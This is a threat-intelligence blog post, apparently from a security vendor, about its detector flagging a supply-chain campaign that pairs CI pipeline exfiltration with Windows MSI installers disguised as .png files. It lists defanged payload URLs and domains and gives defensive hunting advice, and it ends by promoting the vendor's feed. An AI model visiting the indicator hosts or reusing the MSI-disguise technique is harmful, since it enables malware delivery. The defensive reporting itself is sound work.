Our Sandtrout Detector Flagged a Pipeline-Exfil and MSI-Stager Cluster With Hours to Spare. Three Indicators Nobody Else Has Published Yet.

This morning one of our precursor detectors, the one we call Sandtrout, climbed from a score of 0.4 to 0.6 and crossed its elevation threshold, with a stated lead time of zero to six hours before the campaign it stages typically fires. That detector is named for the larval form of Frank Herbert's sandworm, because the entire premise is that the worm is easier to catch before it grows. Sandtrout watches for the larval phase of supply-chain worms — credential encapsulation, maintainer-account compromise, build-pipeline tampering — before the mass-publish bloom that everyone else covers after the fact. It caught the TeamPCP Mini-Shai-Hulud campaign hours before the @antv mass-publish bloom on May 27. This morning it caught something else, and the useful part is that the specific artifacts do not appear in anyone's public reporting yet.

What It Saw

Three markers, which together describe a chain rather than a single tool. The first is a build-pipeline artifact, a diff whose name describes its job: pipeline exfiltration — the stage where an attacker who has gotten into a continuous-integration pipeline siphons the secrets and source that live there. The other two are payload-staging URLs, and they share a tell that should make any defender's neck prickle: files ending in .png that are not images at all. They are Windows installer packages wearing a picture's file extension. One sits on a throwaway top-level-domain host, hxxps://canigrup[.]top/optimized_MSI.png. The other is parked on what looks like a compromised legitimate business website, hxxps://brenmayasociados[.]com/sass/optimized_MSIyu.png. Both of those indicators, plus their parent domains, are now live in our IOC feed under the source tag sandtrout-precursor, and as of this morning neither was present in our corpus or, as far as we can find, in public threat reporting.

Why The Disguise Matters

The MSI-stager-via-image trick is having a moment. The SANS Internet Storm Center published a diary on June 5 titled, with appropriate exasperation, "The Evil MSI Background is Back," documenting payloads embedded into image files as a technique that is getting more popular, not less. The reason it works is the same reason living-off-the-land tradecraft always works: msiexec is a trusted, signed Windows binary, and a malicious MSI delivered through it sails past controls that are watching for unsigned executables. Renaming the payload to .png buys the attacker one more layer of camouflage at the download stage, because a great many web filters, mail gateways, and casual human eyeballs treat a .png as harmless by definition. It is not harmless. It is an installer with a costume on.

What makes this particular catch worth writing down is not the technique, which is documented, but the assembly. A pipeline-exfiltration diff and two disguised-MSI payloads on two different kinds of host — one disposable, one hijacked — is the shape of a full operation staging itself: get into the build pipeline, steal what is there, and pre-position the endpoint payloads on infrastructure that will not get taken down before the campaign fires. We are looking at the larval stage of that, before the bloom, which is the only stage at which a defender has any time at all.

The Whole Point Is The Clock

We have written before that our structural advantage is not budget; it is where we choose to look. By the time a disguised-MSI campaign shows up in an incident-response writeup, the MSI has already run on somebody's machine. The value of watching the staging end — the moment a pipeline-exfil diff and a costumed installer appear on attacker infrastructure — is that you are reading the campaign's intentions hours before it acts on them, not weeks after. Six hours is not a lot of time. It is also the difference between a hunt and an autopsy. Sandtrout exists to convert the second into the first, and this morning it did.

What A Defender Should Do With This

Block and hunt the three indicators: the two payload URLs and their parent domains, canigrup[.]top and brenmayasociados[.]com, are in our free STIX feed now and you can pull them this morning. Beyond the specific indicators, hunt the behaviors, because the next campaign will use different hosts. Look for files delivered with an image extension whose actual content is an MSI — the magic bytes do not lie even when the extension does, so inspect file headers rather than trusting the suffix. Watch for msiexec invoking from a URL or a non-standard path, and for MSI installs that spawn script interpreters or reach out to the network. On the supply-chain side, treat your CI/CD pipeline as a credential vault that an attacker wants to drain quietly: alarm on anomalous pipeline runs, unexpected secret access, and workflow changes pushed by accounts that do not normally touch them. And if you run a legitimate website and you are reading this, understand that the brenmayasociados[.]com pattern means your site can be conscripted as someone else's payload host without your knowledge — check your own public directories for files you did not put there.

We caught this one as a larva. The honest caveat, as always, is that we catch the ones that stage where we are watching and miss the ones that do not, so this is a floodlight, not a force field. But a floodlight pointed at the staging ground, six hours before the bloom, is exactly the instrument most defenders do not have — and on a quiet Wednesday morning it lit up three indicators that, for now, are ours and nobody else's.

The threat feed this post is built on

1.14M+ IOCs, STIX 2.1, precursor signals, supply-chain detection. Free API key in 30 seconds.

Get your free key → analytics.dugganusa.com/stix/register